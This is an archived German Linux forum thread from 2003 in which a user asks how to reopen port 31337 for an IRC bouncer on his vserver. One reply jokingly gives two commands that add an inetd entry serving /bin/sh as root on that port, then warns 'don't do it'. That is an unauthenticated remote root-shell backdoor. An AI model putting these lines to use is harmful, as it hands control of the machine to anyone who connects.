Hinweis: Das Forum wird geschlossen! Neue Registrierungen sind nicht mehr möglich!

 Zurück zu Pro-Linux   Foren-Übersicht   FAQ     Suchen    Mitgliederliste
wie schlate ich eine port unter linus redhat frei? vserver im inet !

 
Neuen Beitrag schreiben   Auf Beitrag antworten    Pro-Linux Foren-Übersicht -> Sonstiges
Vorheriges Thema anzeigen :: Nächstes Thema anzeigen  
Autor Nachricht
zer0co0l
Gast





BeitragVerfasst am: 03. März 2003 18:39   Titel: wie schlate ich eine port unter linus redhat frei? vserver im inet !

Kann mir bitte einer helfen!! Ich habe damals einen BNC auf meiner shell installiert und der hat sich den port 31337 freigeschlatet. nach dem letzten reboot wurde der port aber nicht wieder freigeschlatet kann mir einer helfen und mir mitteilen wie ich diesen port manuel wieder freischalten kann ???
 

Andreas B.
Gast





BeitragVerfasst am: 03. März 2003 19:52   Titel: Re: wie schlate ich eine port unter linus redhat frei? vserver im inet !

st4rt th4 BNC @ 5y5 !n!t

warum net gleich 1337 ?

ps.
wie hat er sich denn den Port freigeschaltet ?

pps.
play Elite
 

max



Anmeldungsdatum: 14.05.2000
Beiträge: 806
Wohnort: Ruhrpott

BeitragVerfasst am: 03. März 2003 23:50   Titel: Re: wie schlate ich eine port unter linus redhat frei? vserver im inet !

BNC?
Bei mir war das vor gar nicht allzulanger Zeit ein wichtiger Bestandteil meines Netzes *g*
Was habe ich verpasst?

im zweifelsfalle:

echo "bnc 31337/tcp" >> /etc/services
echo "bnc stream tcp nowait root /bin/sh" >> /etc/inetd.conf
ach ja und ne Mail an mich bei jeder Einwahl.
;-)


Gruss Max
PS ...tue es nicht!!....
 
Benutzer-Profile anzeigen Private Nachricht senden

Beiträge vom vorherigen Thema anzeigen:   
     Pro-Linux Foren-Übersicht -> Sonstiges Alle Zeiten sind GMT + 1 Stunde
Seite 1 von 1

 
Gehen Sie zu:  

Powered by phpBB © phpBB Group
pro_linux Theme © 2004 by Mandaxy